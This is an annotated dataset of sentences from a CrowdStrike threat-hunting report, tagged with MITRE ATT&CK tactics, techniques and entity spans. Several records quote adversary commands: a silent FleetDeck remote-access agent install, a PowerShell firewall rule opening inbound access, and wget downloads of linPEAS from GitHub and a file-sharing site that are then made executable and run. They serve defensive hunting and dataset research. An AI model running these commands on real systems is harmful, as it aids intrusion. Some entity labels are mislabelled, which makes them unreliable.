"crowdstrike-49_crowdstrike_report-p29-s345-0a1231", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 29, "sentence_id": 345, "context_before": "For more details of SCATTERED SPIDER’s use of RMM tools, see this related blog:", "sentence_text": "NOWHERE TO HIDE 29 Notes for Defenders Falcon OverWatch observed FleetDeck activity at multiple entities primarily in the services, technology and telecommunications verticals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p29-s346-bd83d4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 29, "sentence_id": 346, "context_before": "NOWHERE TO HIDE 29 Notes for Defenders Falcon OverWatch observed FleetDeck activity at multiple entities primarily in the services, technology and telecommunications verticals.", "sentence_text": "The following insights are based on this real-world activity and contain common indicators of FleetDeck activity, which defenders can use when hunting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p29-s347-dfb1b8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 29, "sentence_id": 347, "context_before": "The following insights are based on this real-world activity and contain common indicators of FleetDeck activity, which defenders can use when hunting.", "sentence_text": "The adversary tested the internet connection to FleetDeck domain:\nping fleetdeck.io\nThe adversary dropped the FleetDeck agent to the victim environment:\nC:\\Users\\[REDACTED Path]\\Downloads\\fleetdeck-agent-[REDACTED\n22CharacterKey].exe\nNote that the agent installer listed above can be executed silently by appending the -silent flag to the command.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1016.001", "name": "Internet Connection Discovery" }, { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "adversary tested connection to fleetdeck using ping and dropped it to victim", "entities": [ { "text": "tested the internet connection to FleetDeck", "start": 14, "end": 57, "label": "Action" }, { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "ping fleetdeck.io", "start": 66, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "adversary ", "start": 88, "end": 98, "label": "MalwareTool" }, { "text": "dropped ", "start": 98, "end": 106, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p29-s348-81c46a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 29, "sentence_id": 348, "context_before": "The adversary tested the internet connection to FleetDeck domain:\nping fleetdeck.io\nThe adversary dropped the FleetDeck agent to the victim environment:\nC:\\Users\\[REDACTED Path]\\Downloads\\fleetdeck-agent-[REDACTED\n22CharacterKey].exe\nNote that the agent installer listed above can be executed silently by appending the -silent flag to the command.", "sentence_text": "The adversary created a Windows host firewall rule via PowerShell for FleetDeck client communication:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.004", "name": "Disable or Modify System Firewall" } ], "procedure": "adversary created new firewall rule", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "created ", "start": 14, "end": 22, "label": "Action" }, { "text": "Windows host firewall rule", "start": 24, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "FleetDeck ", "start": 70, "end": 80, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p29-s349-711ff1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 29, "sentence_id": 349, "context_before": "The adversary created a Windows host firewall rule via PowerShell for FleetDeck client communication:", "sentence_text": "C:\\WINDOWS\\Sysnative\\WindowsPowerShell\\v1.0\\powershell.exe -Command\n\"New-NetFirewallRule -DisplayName 'FleetDeck Agent Service' -Name 'FleetDeck Agent Service Command' -Direction Inbound -Program 'C:\\ Program Files (x86)\\FleetDeck Agent\\fleetdeck_agent_svc.exe' -Action Allow\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s350-c6b8de", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 350, "context_before": "C:\\WINDOWS\\Sysnative\\WindowsPowerShell\\v1.0\\powershell.exe -Command\n\"New-NetFirewallRule -DisplayName 'FleetDeck Agent Service' -Name 'FleetDeck Agent Service Command' -Direction Inbound -Program 'C:\\ Program Files (x86)\\FleetDeck Agent\\fleetdeck_agent_svc.exe' -Action Allow\"", "sentence_text": "NOWHERE TO HIDE 30 Defensive Countermeasures Monitor and conduct active hunts for newly identified threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s351-8c0644", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 351, "context_before": "NOWHERE TO HIDE 30 Defensive Countermeasures Monitor and conduct active hunts for newly identified threats.", "sentence_text": "The RMM tool landscape is dynamic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s352-e44c54", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 352, "context_before": "The RMM tool landscape is dynamic.", "sentence_text": "As new tools are identified or known tools add new functionality, research the new RMM behaviors and actively review logs for evidence of execution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s353-a0ff53", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 353, "context_before": "As new tools are identified or known tools add new functionality, research the new RMM behaviors and actively review logs for evidence of execution.", "sentence_text": "Implement application allowlisting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s354-73f048", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 354, "context_before": "Implement application allowlisting.", "sentence_text": "Threat actors may attempt to execute RMM tools that are not standard software in the victim environment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Threat actors using unusual RMM tools for victim environment", "entities": [ { "text": "Threat actors", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "attempt to execute", "start": 18, "end": 36, "label": "Action" }, { "text": "RMM tools", "start": 37, "end": 46, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s355-3b2ca7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 355, "context_before": "Threat actors may attempt to execute RMM tools that are not standard software in the victim environment.", "sentence_text": "Application allowlisting prevents unapproved binaries from executing within an organization's environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s356-1b8797", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 356, "context_before": "Application allowlisting prevents unapproved binaries from executing within an organization's environment.", "sentence_text": "Monitor for unapproved RMM applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s357-cc1d92", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 357, "context_before": "Monitor for unapproved RMM applications.", "sentence_text": "Conduct long-tail analysis on installed applications and observed executables within an organization's fleet of endpoints to identify outliers that may be unapproved software, including RMM tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s358-996113", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 358, "context_before": "Conduct long-tail analysis on installed applications and observed executables within an organization's fleet of endpoints to identify outliers that may be unapproved software, including RMM tools.", "sentence_text": "Monitor for unexpected host firewall changes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s359-d89385", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 359, "context_before": "Monitor for unexpected host firewall changes.", "sentence_text": "RMM tools may alter host firewall rules as part of an installation process.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.004", "name": "Disable or Modify System Firewall" } ], "procedure": "RMM tools alter firewall rules", "entities": [ { "text": "RMM tools", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "alter host firewall rules", "start": 14, "end": 39, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s360-0e4a01", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 360, "context_before": "RMM tools may alter host firewall rules as part of an installation process.", "sentence_text": "Review unexpected changes in host firewall rules that may indicate an unapproved application installation altered those rules.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s361-46c201", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 361, "context_before": "Review unexpected changes in host firewall rules that may indicate an unapproved application installation altered those rules.", "sentence_text": "Strengthen firewall rules and network access control lists.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p30-s362-dbc82b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 30, "sentence_id": 362, "context_before": "Strengthen firewall rules and network access control lists.", "sentence_text": "Many RMM software packages require connectivity to known external endpoints over common ports and protocols that can be blocked.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s363-d33d18", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 363, "context_before": "Many RMM software packages require connectivity to known external endpoints over common ports and protocols that can be blocked.", "sentence_text": "The benefits that cloud computing provides have made it an indispensable part of businesses’ modern IT infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s364-d410d0", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 364, "context_before": "The benefits that cloud computing provides have made it an indispensable part of businesses’ modern IT infrastructure.", "sentence_text": "Key Facts The nature of the attack surface has changed and presents significant security challenges for organizations with a cloud presence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s365-fe57bc", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 365, "context_before": "Key Facts The nature of the attack surface has changed and presents significant security challenges for organizations with a cloud presence.", "sentence_text": "and Figures In the past year, Falcon OverWatch has observed numerous instances of insecure at a Glance:\nconfigurations as well as built-in cloud platform functionality being abused by adversaries to progress their intrusions.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1535", "name": "Unused/Unsupported Cloud Regions" }, { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "unsecure accounts on cloud being abused by adversaries", "entities": [ { "text": "adversaries ", "start": 184, "end": 196, "label": "MalwareTool" }, { "text": "abused ", "start": 174, "end": 181, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s366-871eda", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 366, "context_before": "and Figures In the past year, Falcon OverWatch has observed numerous instances of insecure at a Glance:\nconfigurations as well as built-in cloud platform functionality being abused by adversaries to progress their intrusions.", "sentence_text": "As first reported in the CrowdStrike 2023 Global Threat Report, there was a threefold increase in cases involving cloud- conscious threat actors coupled with a 95% increase in cloud exploitation from 3X 2021 to 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s367-58015c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 367, "context_before": "As first reported in the CrowdStrike 2023 Global Threat Report, there was a threefold increase in cases involving cloud- conscious threat actors coupled with a 95% increase in cloud exploitation from 3X 2021 to 2022.", "sentence_text": "It is clear that adversaries are aware of the importance of the cloud INCREASE IN THE USE OF LINUX and tenacious in their efforts to access cloud assets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s368-f91801", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 368, "context_before": "It is clear that adversaries are aware of the importance of the cloud INCREASE IN THE USE OF LINUX and tenacious in their efforts to access cloud assets.", "sentence_text": "PRIVILEGE ESCALATION TOOL LINPEAS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s369-a0f768", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 369, "context_before": "PRIVILEGE ESCALATION TOOL LINPEAS", "sentence_text": "When it comes to securing the cloud, the old security adage “know thy systems'' is particularly pertinent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s370-38f036", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 370, "context_before": "When it comes to securing the cloud, the old security adage “know thy systems'' is particularly pertinent.", "sentence_text": "Adversaries are quick to take advantage of visibility and knowledge gaps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p31-s371-a960ca", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 31, "sentence_id": 371, "context_before": "Adversaries are quick to take advantage of visibility and knowledge gaps.", "sentence_text": "95%\nINCREASE IN CLOUD EXPLOITATION IN 2022 3X INCREASE IN CASES INVOLVING CLOUD-CONSCIOUS THREAT ACTORS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s372-0bf9fa", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 372, "context_before": "95%\nINCREASE IN CLOUD EXPLOITATION IN 2022 3X INCREASE IN CASES INVOLVING CLOUD-CONSCIOUS THREAT ACTORS", "sentence_text": "NOWHERE TO HIDE 32 ADVERSARIES LEVERAGE LINPEAS TOOL FOR CLOUD DISCOVERY Falcon OverWatch detected several intrusions at the cloud workload level where adversaries gained access to a cloud server and used the Linux privilege escalation tool linPEAS to enumerate the environment.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1580", "name": "Cloud Infrastructure Discovery" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "adversaries use tools for cloud discoveries and gaining access", "entities": [ { "text": "ADVERSARIES ", "start": 19, "end": 31, "label": "MalwareTool" }, { "text": "LEVERAGE LINPEAS TOOL", "start": 31, "end": 52, "label": "Action" }, { "text": "CLOUD", "start": 57, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "the cloud workload level", "start": 121, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "adversaries", "start": 152, "end": 163, "label": "MalwareTool" }, { "text": "gained access", "start": 164, "end": 177, "label": "Action" }, { "text": "cloud server", "start": 183, "end": 195, "label": "Infrastructure_Indicator" }, { "text": "used", "start": 200, "end": 204, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s373-2820f6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 373, "context_before": "NOWHERE TO HIDE 32 ADVERSARIES LEVERAGE LINPEAS TOOL FOR CLOUD DISCOVERY Falcon OverWatch detected several intrusions at the cloud workload level where adversaries gained access to a cloud server and used the Linux privilege escalation tool linPEAS to enumerate the environment.", "sentence_text": "This process inspects local files including /etc/hosts, /etc/resolv.conf and vendor-specific configuration files, as well as HTTP requests using both curl and wget, to a well-known cloud service provider’s API endpoints.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s374-963af8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 374, "context_before": "This process inspects local files including /etc/hosts, /etc/resolv.conf and vendor-specific configuration files, as well as HTTP requests using both curl and wget, to a well-known cloud service provider’s API endpoints.", "sentence_text": "The cloud module currently supports discovery of Google Cloud, DigitalOcean Droplet, IBM Cloud, and Amazon's Elastic Container Service (ECS), Elastic Compute Cloud (EC2), EC2 Beanstalk and Lambda.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s375-dfec80", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 375, "context_before": "The cloud module currently supports discovery of Google Cloud, DigitalOcean Droplet, IBM Cloud, and Amazon's Elastic Container Service (ECS), Elastic Compute Cloud (EC2), EC2 Beanstalk and Lambda.", "sentence_text": "In one instance, Falcon OverWatch discovered an adversary downloading a pre- compiled version of the linPEAS tool.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download a pre-compiled version of the linPEAS tool.", "entities": [ { "text": "adversary", "start": 48, "end": 57, "label": "ThreatActor" }, { "text": "downloading a pre- compiled version of the linPEAS tool", "start": 58, "end": 113, "label": "Action" }, { "text": "linPEAS", "start": 101, "end": 108, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s376-cef8c6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 376, "context_before": "In one instance, Falcon OverWatch discovered an adversary downloading a pre- compiled version of the linPEAS tool.", "sentence_text": "They renamed the file via mv, set execute permissions and attempted execution of the file:\nwget https[:]//github[.]com/carlospolop/PEASS-ng/releases/download/", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" }, { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "renaming a file then set execute permissions then attempt execution of it", "entities": [ { "text": "renamed ", "start": 5, "end": 13, "label": "Action" }, { "text": "mv", "start": 26, "end": 28, "label": "MalwareTool" }, { "text": "set execute permissions", "start": 30, "end": 53, "label": "Action" }, { "text": "attempted execution", "start": 58, "end": 77, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s377-791bb6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 377, "context_before": "They renamed the file via mv, set execute permissions and attempted execution of the file:\nwget https[:]//github[.]com/carlospolop/PEASS-ng/releases/download/", "sentence_text": "[REDACTED Path]/linpeas_darwin_arm64", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s378-07b871", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 378, "context_before": "[REDACTED Path]/linpeas_darwin_arm64", "sentence_text": "mv linpeas_darwin_arm64 x chmod +x x ./x", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s379-27e15d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 379, "context_before": "mv linpeas_darwin_arm64 x chmod +x x ./x", "sentence_text": "Not all ingress of the linPEAS tool comes from the official GitHub repository — adversaries are also known to stage tooling to sources under their control.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "adversaries stage tools", "entities": [ { "text": "adversaries ", "start": 80, "end": 92, "label": "MalwareTool" }, { "text": "stage tooling", "start": 110, "end": 123, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s380-806df3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 380, "context_before": "Not all ingress of the linPEAS tool comes from the official GitHub repository — adversaries are also known to stage tooling to sources under their control.", "sentence_text": "Reasons for this may include ready access to custom-compiled versions to evade signature-based detection, as well as avoiding source URLs that identify the tooling.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s381-df7ea5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 381, "context_before": "Reasons for this may include ready access to custom-compiled versions to evade signature-based detection, as well as avoiding source URLs that identify the tooling.", "sentence_text": "In this second example, Falcon OverWatch observed the adversary attempting to download linPEAS from a common file-sharing website after a previous attempt from the GitHub repository was prevented:\nwget https[:]//github[.]com/carlospolop/PEASS-ng/releases/download/", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "adversary trying to download tool", "entities": [ { "text": "adversary ", "start": 54, "end": 64, "label": "MalwareTool" }, { "text": "download linPEAS", "start": 78, "end": 94, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s382-600376", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 382, "context_before": "In this second example, Falcon OverWatch observed the adversary attempting to download linPEAS from a common file-sharing website after a previous attempt from the GitHub repository was prevented:\nwget https[:]//github[.]com/carlospolop/PEASS-ng/releases/download/", "sentence_text": "[REDACTED Path]/linpeas_linux_amd64 -O aa wget https[:]//filebin[.]net/[REDACTED Path]/[REDACTED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p32-s383-8e9d87", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 32, "sentence_id": 383, "context_before": "[REDACTED Path]/linpeas_linux_amd64 -O aa wget https[:]//filebin[.]net/[REDACTED Path]/[REDACTED", "sentence_text": "FileName]\nThe cloud discovery module of linPEAS can allow access to sensitive information about cloud environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s384-70adb7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 384, "context_before": "FileName]\nThe cloud discovery module of linPEAS can allow access to sensitive information about cloud environments.", "sentence_text": "NOWHERE TO HIDE 33 Defensive Countermeasures On-premises security best practices apply in the cloud.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s385-f44847", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 385, "context_before": "NOWHERE TO HIDE 33 Defensive Countermeasures On-premises security best practices apply in the cloud.", "sentence_text": "In the previous examples, the adversary initiated an outbound connection from the cloud workload instance to an external website to download malicious files.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "adversary initiated an outbound connection from cloud to external website to download malicious files", "entities": [ { "text": "adversary", "start": 30, "end": 39, "label": "MalwareTool" }, { "text": "initiated an outbound connection", "start": 40, "end": 72, "label": "Action" }, { "text": "download ", "start": 132, "end": 141, "label": "Action" }, { "text": "malicious files.", "start": 141, "end": 157, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s386-6d1055", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 386, "context_before": "In the previous examples, the adversary initiated an outbound connection from the cloud workload instance to an external website to download malicious files.", "sentence_text": "Cloud workload servers should be subject to at least the same security policies as any other server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s387-0548dc", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 387, "context_before": "Cloud workload servers should be subject to at least the same security policies as any other server.", "sentence_text": "Best practice dictates that outbound connections initiated from any server should be denied other than to allowlisted endpoints.30 This practice accomplishes two important goals:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s388-f301f6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 388, "context_before": "Best practice dictates that outbound connections initiated from any server should be denied other than to allowlisted endpoints.30 This practice accomplishes two important goals:", "sentence_text": "First, it helps to deny the adversary access to internet resources and prevents direct malware ingress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s389-5e18a9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 389, "context_before": "First, it helps to deny the adversary access to internet resources and prevents direct malware ingress.", "sentence_text": "Second, if an attack should progress, it makes it much more difficult for an adversary to exfiltrate data or establish a C2 channel directly from the compromised cloud asset to an external endpoint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s390-eac544", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 390, "context_before": "Second, if an attack should progress, it makes it much more difficult for an adversary to exfiltrate data or establish a C2 channel directly from the compromised cloud asset to an external endpoint.", "sentence_text": "Know your systems or invest in security measures to improve visibility.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s391-8ba3e2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 391, "context_before": "Know your systems or invest in security measures to improve visibility.", "sentence_text": "visibility into cloud assets and can help security practitioners understand and improve the overall baseline security posture and compliance of their environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s392-4b6904", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 392, "context_before": "visibility into cloud assets and can help security practitioners understand and improve the overall baseline security posture and compliance of their environments.", "sentence_text": "Falcon OverWatch provides added defense in the cloud for novel threats and alerts security teams with contextualized detection information when such threats are discovered in a customer's environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p33-s393-7a9b72", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 33, "sentence_id": 393, "context_before": "Falcon OverWatch provides added defense in the cloud for novel threats and alerts security teams with contextualized detection information when such threats are discovered in a customer's environment.", "sentence_text": "To learn more about CrowdStrike’s CNAPP solution, see https://www.crowdstrike.com/products/cloud-security/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s394-5885eb", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 394, "context_before": "To learn more about CrowdStrike’s CNAPP solution, see https://www.crowdstrike.com/products/cloud-security/.", "sentence_text": "NOWHERE TO HIDE 34 ECRIME ADVERSARIES USE AZURE RUN COMMANDS TO DEPLOY MALWARE", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.009", "name": "Cloud API" } ], "procedure": "Adversaries use azure run commands to deploy malware", "entities": [ { "text": "ADVERSARIES", "start": 26, "end": 37, "label": "MalwareTool" }, { "text": "USE AZURE RUN COMMANDS TO DEPLOY MALWARE", "start": 38, "end": 78, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s395-779459", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 395, "context_before": "NOWHERE TO HIDE 34 ECRIME ADVERSARIES USE AZURE RUN COMMANDS TO DEPLOY MALWARE", "sentence_text": "Although not new, a less commonly discussed vector for cloud-conscious execution is the use of Azure Run Commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s396-c4d4b3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 396, "context_before": "Although not new, a less commonly discussed vector for cloud-conscious execution is the use of Azure Run Commands.", "sentence_text": "In the past year, Falcon OverWatch observed multiple instances of eCrime adversaries using this Azure feature to attempt script execution across virtual machines (VMs) in Azure cloud environments.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "adversaries use azure features to attempt script execution", "entities": [ { "text": "adversaries", "start": 73, "end": 84, "label": "MalwareTool" }, { "text": "using this Azure feature", "start": 85, "end": 109, "label": "Action" }, { "text": "script execution", "start": 121, "end": 137, "label": "Action" }, { "text": "Azure cloud environments.", "start": 171, "end": 196, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s397-bb6174", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 397, "context_before": "In the past year, Falcon OverWatch observed multiple instances of eCrime adversaries using this Azure feature to attempt script execution across virtual machines (VMs) in Azure cloud environments.", "sentence_text": "Run Commands are part of the default VM agent and legitimately used to manage Azure VMs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 